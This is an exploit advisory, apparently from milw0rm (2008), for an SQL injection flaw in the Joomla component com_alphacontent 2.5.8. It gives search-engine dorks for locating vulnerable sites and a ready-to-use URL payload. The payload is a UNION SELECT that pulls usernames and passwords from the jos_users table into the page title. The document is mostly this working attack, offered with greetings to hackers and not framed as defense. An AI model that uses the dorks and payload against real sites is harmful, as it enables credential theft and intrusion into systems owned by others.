########################################## # # [ Joomla Component com_alphacontent SQL Injection ] # ########################################## [~] Vulnerability found by: cO2 [ Algeria Security Crew ] [~] Contact: c02[at]hotmail.de [~] Website: http://www.dzw0rm.ch [~] Greetings: to all hackers DZ ########################################## [~] ScriptName : 'Joomla' [~] ModuleName : 'AlphaContent' [~] Version() : '2.5.8 ' ########################################### # # DORK 1 : inurl: "com_alphacontent" # # DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr" # ########################################### [+]Exploit : index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/* ########################################### [+] : you can see the password in 'Title' ########################################### side note: alphacontent 25 Jul 2007 Bernard Gilly This component is released under the GNU/GPL License. contact@visualclinic.fr www.visualclinic.fr 2.5.8 Directory component with alphabetical indexes for Joomla's Content alphacontent 16 Sept 2006 Bernard Gilly This component is released under the GNU/GPL License. contact@visualclinic.fr www.visualclinic.fr 2.5.4 Directory component and alphabetical indexes for Mambo/Joomla's Content # milw0rm.com [2008-03-25]